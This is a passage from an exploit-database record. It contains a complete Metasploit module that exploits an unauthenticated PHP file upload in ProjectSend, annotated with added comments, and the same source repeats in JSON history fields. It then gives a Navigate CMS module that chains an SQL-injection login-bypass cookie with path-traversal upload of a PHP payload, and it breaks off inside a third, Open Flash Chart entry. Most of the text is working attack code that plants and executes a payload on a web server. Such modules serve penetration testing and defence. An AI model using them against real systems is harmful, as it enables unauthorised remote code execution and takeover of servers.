ID 1337DAY-ID-23041 Type zdt Reporter metasploit Modified 2014-12-30T00:00:00
Description
This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  #
  # Module metadata and options.
  #
  # Registers a single option, TARGETURI (base path of the ProjectSend
  # install, default '/ProjectSend/'); every request below is built
  # relative to it with normalize_uri.
  #
  # @param info [Hash] module info passed through update_info
  #
  def initialize(info={})
    super(update_info(info,
      'Name' => 'ProjectSend Arbitrary File Upload',
      'Description' => %q{
This module exploits a file upload vulnerability in ProjectSend
revisions 100 to 561. The 'process-upload.php' file allows
unauthenticated users to upload PHP files resulting in remote
code execution as the web server user.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Fady Mohammed Osman', # Discovery and Exploit
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References' =>
        [
          ['EDB', '35424']
        ],
      'Payload' =>
        {
          'BadChars' => "\x00" # the payload encoder must avoid NUL
        },
      'Arch' => ARCH_PHP,
      'Platform' => 'php',
      'Targets' =>
        [
          # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)
          ['ProjectSend (PHP Payload)', {}]
        ],
      'Privileged' => false,
      'DisclosureDate' => 'Dec 02 2014',
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])
      ], self.class)
  end

  #
  # Checks if target upload functionality is working
  #
  # Sends one request to process-upload.php (no file attached) and maps the
  # reply onto a CheckCode from the status code and body markers:
  #   no reply                                  -> Unknown
  #   404                                       -> Safe  (script absent)
  #   500                                       -> Safe  (logged as "Unable to write file")
  #   200 with a literal "<?php" in the body    -> Safe  (PHP source served, not executed)
  #   200 mentioning sys.config.php             -> Safe  (install misconfigured)
  #   200 with a jsonrpc body:
  #     "NewFileName"                           -> Vulnerable (revision 118 onwards)
  #     bare jsonrpc null result                -> Appears    (revisions 100 to 117)
  #     "Failed to open output stream"          -> Safe       (upload folder not writable)
  #     anything else                           -> Detected
  #   any other reply                           -> Safe
  #
  # Defender note: this probe and the POST in #upload both reach
  # process-upload.php without any credentials; unauthenticated requests to
  # that path are the observable signal in web server logs.
  #
  # @return [Exploit::CheckCode]
  #
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'process-upload.php')
    )
    if !res
      vprint_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    elsif res.code.to_i == 404
      vprint_error("#{peer} - No process-upload.php found")
      return Exploit::CheckCode::Safe
    elsif res.code.to_i == 500
      vprint_error("#{peer} - Unable to write file")
      return Exploit::CheckCode::Safe
    elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
      vprint_error("#{peer} - File process-upload.php is not executable")
      return Exploit::CheckCode::Safe
    elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
      vprint_error("#{peer} - Software is misconfigured")
      return Exploit::CheckCode::Safe
    elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
      # response on revision 118 onwards includes the file name
      if res.body && res.body =~ /NewFileName/
        return Exploit::CheckCode::Vulnerable
      # response on revisions 100 to 117 does not include the file name
      elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
        return Exploit::CheckCode::Appears
      elsif res.body && res.body =~ /Failed to open output stream/
        vprint_error("#{peer} - Upload folder is not writable")
        return Exploit::CheckCode::Safe
      else
        return Exploit::CheckCode::Detected
      end
    else
      return Exploit::CheckCode::Safe
    end
  end

  #
  # Upload PHP payload
  #
  # Builds a random 6..15 character alphanumeric file name ending in .php,
  # wraps the encoded payload in "<?php ... ?>" and POSTs it as the multipart
  # part named "file" to process-upload.php?name=<fname>.
  #
  # Reply handling mirrors #check: 404 / 500 / not-writable / not-executable /
  # misconfigured replies abort through fail_with. A body containing
  # "NewFileName" (revision 118 onwards) is treated as a confirmed upload; the
  # bare jsonrpc null result (revisions 100 to 117) is accepted with a warning
  # because those revisions do not echo the stored name back.
  #
  # @return [String] the uploaded file name (not its path on the server)
  #
  def upload
    # rand(10) + 6 yields a name length of 6..15
    fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"
    php = "<?php #{payload.encoded} ?>"
    data = Rex::MIME::Message.new
    data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}"))
    post_data = data.to_s
    print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)")
    res = send_request_cgi(
      'method' => 'POST',
      # the file name travels both as the ?name= query parameter and as the
      # multipart filename
      'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    )
    if !res
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
    elsif res.code.to_i == 404
      fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
    elsif res.code.to_i == 500
      fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
    elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
      fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
    elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
      fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
    # NOTE(review): the dots are unescaped here, unlike /sys\.config\.php/ in
    # #check, so this pattern also matches any single character in their
    # place; harmless in practice but inconsistent
    elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
      fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
    # response on revision 118 onwards includes the file name
    elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
      print_good("#{peer} - Payload uploaded successfully (#{fname})")
      return fname
    # response on revisions 100 to 117 does not include the file name
    # (no res.body guard on this branch, unlike the ones above; nil =~ /re/
    # evaluates to nil, so a missing body simply falls through to else)
    elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
      print_warning("#{peer} - File upload may have failed")
      return fname
    else
      vprint_debug("#{peer} - Received response: #{res.code} - #{res.body}")
      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
    end
  end

  #
  # Execute uploaded file
  #
  # Requests upload_path relative to TARGETURI so the web server runs the
  # dropped PHP file. The trailing 5 passed to send_request_raw is the
  # response timeout in seconds. Only the outcome is logged; the return value
  # is not used and the caller judges success from session_created?.
  #
  # @param upload_path [String] path of the uploaded file below TARGETURI
  #
  def exec(upload_path)
    print_status("#{peer} - Executing #{upload_path}...")
    res = send_request_raw(
      { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
    )
    if !res
      # NOTE(review): a timeout is logged at status rather than error level,
      # presumably because a running payload may never answer the request
      print_status("#{peer} - Request timed out while executing")
    elsif res.code.to_i == 404
      vprint_error("#{peer} - Not found: #{upload_path}")
    elsif res.code.to_i == 200
      vprint_good("#{peer} - Executed #{upload_path}")
    else
      print_error("#{peer} - Unexpected reply")
    end
  end

  #
  # upload && execute
  #
  # Uploads the payload, registers it for cleanup, then requests it from
  # upload/files/ (default location from r-221 onwards) and, if no session
  # came back, from upload/temp/ (default for r-100 to r-219).
  #
  # NOTE(review): register_files_for_cleanup receives the bare file name,
  # while the file is served from upload/files/ or upload/temp/; unless the
  # session's working directory is that folder, the dropped .php file is
  # likely left behind. Responders should check both directories for
  # short random alphanumeric .php names.
  #
  def exploit
    fname = upload
    register_files_for_cleanup(fname)
    exec("upload/files/#{fname}") # default for r-221 onwards
    unless session_created?
      exec("upload/temp/#{fname}") # default for r-100 to r-219
    end
  end
end
# 0day.today [2018-01-06] #
{"hash": "b45fbd00bc811684a8ceee99c726a0c35d9504338363c56b8b774404d66e097a", "id": "1337DAY-ID-23041", "lastseen": "2018-01-06T07:00:21", "viewCount": 16, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "0ae13ecce5197c76eba23ab354cfb4fc", "key": "description"}, {"hash": "1be4985a17c84e1f1e6be789bfeeb96f", "key": "href"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "modified"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "9399f4c8f752b2882d1fc7d453c04008", "key": "sourceData"}, {"hash": "6e882c46fd45e6e50e548c3217287077", "key": "sourceHref"}, {"hash": "e4dadfa7631398e731956ec8d5ae36f2", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-01-06T07:00:21"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-23043", "1337DAY-ID-18946", "1337DAY-ID-16622", "1337DAY-ID-16623", "1337DAY-ID-16503", "1337DAY-ID-13854"]}, {"type": "seebug", "idList": ["SSV:67248"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2010-0037.NASL", "REDHAT-RHSA-2010-0060.NASL", "REDHAT-RHSA-2010-0038.NASL", "SUSE_ACROREAD-6803.NASL", "SUSE_ACROREAD_JA-6805.NASL", "SUSE_ACROREAD-6802.NASL", "SUSE_ACROREAD_JA-6804.NASL", "SUSE_11_ACROREAD_JA-100128.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/BSPLAYER_M3U"]}, {"type": "exploitdb", "idList": ["EDB-ID:16623", "EDB-ID:16503"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10516"]}], "modified": "2018-01-06T07:00:21"}, "vulnersScore": 0.5}, "type": "zdt", "sourceHref": 
"https://0day.today/exploit/23041", "description": "This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.", "title": "ProjectSend Arbitrary File Upload Exploit", "history": [{"bulletin": {"hash": "461131f39537a6010b5e10d2edc8c2c40867e3a6dd6915e97f933b7b079c5757", "id": "1337DAY-ID-23041", "lastseen": "2016-04-20T02:13:19", "enchantments": {"score": {"value": 9.0, "modified": "2016-04-20T02:13:19"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b889bd0cfbd114f81bae34f1b4b53b0d", "key": "sourceData"}, {"hash": "c318f49173c357c51baf9365199ac4b1", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "0ae13ecce5197c76eba23ab354cfb4fc", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d49ed7013c17e5e554f40e5a7735c0a3", "key": "href"}, {"hash": "e4dadfa7631398e731956ec8d5ae36f2", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/23041", "description": "This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. 
The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.", "viewCount": 3, "title": "ProjectSend Arbitrary File Upload Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'ProjectSend Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ProjectSend\r\n revisions 100 to 561. The 'process-upload.php' file allows\r\n unauthenticated users to upload PHP files resulting in remote\r\n code execution as the web server user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Fady Mohammed Osman', # Discovery and Exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['EDB', '35424']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)\r\n ['ProjectSend (PHP Payload)', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Checks if target upload functionality is working\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'process-upload.php')\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - Connection timed 
out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - No process-upload.php found\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 500\r\n vprint_error(\"#{peer} - Unable to write file\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n vprint_error(\"#{peer} - File process-upload.php is not executable\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys\\.config\\.php/\r\n vprint_error(\"#{peer} - Software is misconfigured\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/\r\n # response on revision 118 onwards includes the file name\r\n if res.body && res.body =~ /NewFileName/\r\n return Exploit::CheckCode::Vulnerable\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.body && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n return Exploit::CheckCode::Appears\r\n elsif res.body && res.body =~ /Failed to open output stream/\r\n vprint_error(\"#{peer} - Upload folder is not writable\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Upload PHP payload\r\n #\r\n def upload\r\n fname = \"#{rand_text_alphanumeric(rand(10) + 6)}.php\"\r\n php = \"<?php #{payload.encoded} ?>\"\r\n data = Rex::MIME::Message.new\r\n data.add_part(php, 'application/octet-stream', nil, %(form-data; name=\"file\"; filename=\"#{fname}\"))\r\n post_data = data.to_s\r\n print_status(\"#{peer} - Uploading file '#{fname}' (#{php.length} bytes)\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"process-upload.php?name=#{fname}\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n )\r\n if !res\r\n 
fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No process-upload.php found\")\r\n elsif res.code.to_i == 500\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload folder is not writable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File process-upload.php is not executable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Software is misconfigured\")\r\n # response on revision 118 onwards includes the file name\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/\r\n print_good(\"#{peer} - Payload uploaded successfully (#{fname})\")\r\n return fname\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.code.to_i == 200 && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n print_warning(\"#{peer} - File upload may have failed\")\r\n return fname\r\n else\r\n vprint_debug(\"#{peer} - Received response: #{res.code} - #{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong\")\r\n end\r\n end\r\n\r\n #\r\n # Execute uploaded file\r\n #\r\n def exec(upload_path)\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n res = send_request_raw(\r\n { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5\r\n )\r\n if !res\r\n print_status(\"#{peer} - Request timed out while executing\")\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - Not found: #{upload_path}\")\r\n elsif res.code.to_i == 200\r\n vprint_good(\"#{peer} - Executed #{upload_path}\")\r\n else\r\n print_error(\"#{peer} - Unexpected reply\")\r\n end\r\n end\r\n\r\n #\r\n # 
upload && execute\r\n #\r\n def exploit\r\n fname = upload\r\n register_files_for_cleanup(fname)\r\n exec(\"upload/files/#{fname}\") # default for r-221 onwards\r\n unless session_created?\r\n exec(\"upload/temp/#{fname}\") # default for r-100 to r-219\r\n end\r\n end\r\nend\n\n# 0day.today [2016-04-20] #", "published": "2014-12-30T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-12-30T00:00:00", "href": "http://0day.today/exploit/description/23041"}, "lastseen": "2016-04-20T02:13:19", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'ProjectSend Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ProjectSend\r\n revisions 100 to 561. 
The 'process-upload.php' file allows\r\n unauthenticated users to upload PHP files resulting in remote\r\n code execution as the web server user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Fady Mohammed Osman', # Discovery and Exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['EDB', '35424']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)\r\n ['ProjectSend (PHP Payload)', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Checks if target upload functionality is working\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'process-upload.php')\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - No process-upload.php found\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 500\r\n vprint_error(\"#{peer} - Unable to write file\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n vprint_error(\"#{peer} - File process-upload.php is not executable\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys\\.config\\.php/\r\n vprint_error(\"#{peer} - Software is misconfigured\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/\r\n # response on revision 118 onwards includes the file name\r\n if res.body && res.body =~ /NewFileName/\r\n return Exploit::CheckCode::Vulnerable\r\n # response 
on revisions 100 to 117 does not include the file name\r\n elsif res.body && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n return Exploit::CheckCode::Appears\r\n elsif res.body && res.body =~ /Failed to open output stream/\r\n vprint_error(\"#{peer} - Upload folder is not writable\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Upload PHP payload\r\n #\r\n def upload\r\n fname = \"#{rand_text_alphanumeric(rand(10) + 6)}.php\"\r\n php = \"<?php #{payload.encoded} ?>\"\r\n data = Rex::MIME::Message.new\r\n data.add_part(php, 'application/octet-stream', nil, %(form-data; name=\"file\"; filename=\"#{fname}\"))\r\n post_data = data.to_s\r\n print_status(\"#{peer} - Uploading file '#{fname}' (#{php.length} bytes)\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"process-upload.php?name=#{fname}\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n )\r\n if !res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No process-upload.php found\")\r\n elsif res.code.to_i == 500\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload folder is not writable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File process-upload.php is not executable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Software is misconfigured\")\r\n # response on revision 118 onwards includes the file name\r\n elsif res.code.to_i == 200 && 
res.body && res.body =~ /NewFileName/\r\n print_good(\"#{peer} - Payload uploaded successfully (#{fname})\")\r\n return fname\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.code.to_i == 200 && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n print_warning(\"#{peer} - File upload may have failed\")\r\n return fname\r\n else\r\n vprint_debug(\"#{peer} - Received response: #{res.code} - #{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong\")\r\n end\r\n end\r\n\r\n #\r\n # Execute uploaded file\r\n #\r\n def exec(upload_path)\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n res = send_request_raw(\r\n { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5\r\n )\r\n if !res\r\n print_status(\"#{peer} - Request timed out while executing\")\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - Not found: #{upload_path}\")\r\n elsif res.code.to_i == 200\r\n vprint_good(\"#{peer} - Executed #{upload_path}\")\r\n else\r\n print_error(\"#{peer} - Unexpected reply\")\r\n end\r\n end\r\n\r\n #\r\n # upload && execute\r\n #\r\n def exploit\r\n fname = upload\r\n register_files_for_cleanup(fname)\r\n exec(\"upload/files/#{fname}\") # default for r-221 onwards\r\n unless session_created?\r\n exec(\"upload/temp/#{fname}\") # default for r-100 to r-219\r\n end\r\n end\r\nend\n\n# 0day.today [2018-01-06] #", "published": "2014-12-30T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-12-30T00:00:00", "href": "https://0day.today/exploit/description/23041"}
{"metasploit": [{"lastseen": "2019-12-12T23:12:29", "bulletinFamily": "exploit", "description": "This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. The module then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8.\n", "modified": "2019-08-02T14:48:53", "published": "2018-09-26T19:39:15", "id": "MSF:EXPLOIT/MULTI/HTTP/NAVIGATE_CMS_RCE", "href": "", "type": "metasploit", "title": "Navigate CMS Unauthenticated Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Navigate CMS Unauthenticated Remote Code Execution',\n 'Description' => %q(\n This module exploits insufficient sanitization in the database::protect\n method, of Navigate CMS versions 2.8 and prior, to bypass authentication.\n\n The module then uses a path traversal vulnerability in navigate_upload.php\n that allows authenticated users to upload PHP files to arbitrary locations.\n Together these vulnerabilities allow an unauthenticated attacker to\n execute arbitrary PHP code remotely.\n\n This module was tested against Navigate CMS 2.8.\n ),\n 'Author' =>\n [\n 'Pyriphlegethon' # Discovery / msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2018-17552'], # Authentication bypass\n ['CVE', '2018-17553'] # File upload\n ],\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 
'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 26 2018'))\n\n register_options [\n OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']),\n ]\n\n self.needs_cleanup = true\n end\n\n def login_bypass\n check_resp = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/login.php')\n )\n\n login_bypass_resp = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/login.php'),\n 'cookie' => 'navigate-user=\\\" OR TRUE--%20'\n )\n\n if login_bypass_resp &&\n login_bypass_resp.code == 302 &&\n check_resp.body.include?('Navigate CMS')\n session_id = login_bypass_resp.get_cookies_parsed\n .values.select { |v| v.to_s.include?('NVSID_') }\n .first.first\n return session_id\n end\n end\n\n def check\n return CheckCode::Vulnerable if login_bypass\n CheckCode::Safe\n end\n\n def exploit\n session_id = login_bypass\n fail_with(Failure::NoAccess, 'Login bypass failed') unless session_id\n\n print_good('Login bypass successful')\n\n php = payload.encoded\n data = Rex::MIME::Message.new\n data.add_part(php, 'image/jpeg', nil,\n \"form-data; name=\\\"file\\\"; filename=\\\"#{rand_text_alphanumeric(10..15)}\\\"\")\n data_post = data.to_s\n\n upload = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),\n 'vars_get' => Hash[{\n 'session_id' => session_id,\n 'engine' => 'picnik',\n 'id' => '../../../navigate_info.php'\n }.to_a.shuffle],\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data_post\n )\n\n fail_with(Failure::Unreachable, 'Unable to reach target') unless upload\n fail_with(Failure::Unknown, 'Upload unsuccessful') unless upload.code == 200\n\n print_good('Upload successful')\n\n print_status('Triggering payload...')\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/navigate_info.php')\n )\n end\n\n def on_new_session(session)\n super\n if session.type != 'meterpreter'\n 
print_error('Unable to restore navigate_info.php')\n return\n end\n\n session.core.use('stdapi') if !session.ext.aliases.include?('stdapi')\n\n begin\n session.fs.file.open('navigate_info.php', 'w').write(\"<?php\\n\\nphpinfo();\\n\\n?>\")\n rescue\n print_error('Unable to restore navigate_info.php')\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/navigate_cms_rce.rb"}, {"lastseen": "2019-11-29T09:40:17", "bulletinFamily": "exploit", "description": "This module exploits a file upload vulnerability found in Open Flash Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file in order to upload and execute malicious PHP files.\n", "modified": "2019-01-10T19:19:14", "published": "2013-10-24T12:16:41", "id": "MSF:EXPLOIT/UNIX/WEBAPP/OPEN_FLASH_CHART_UPLOAD_EXEC", "href": "", "type": "metasploit", "title": "Open Flash Chart v2 Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n include 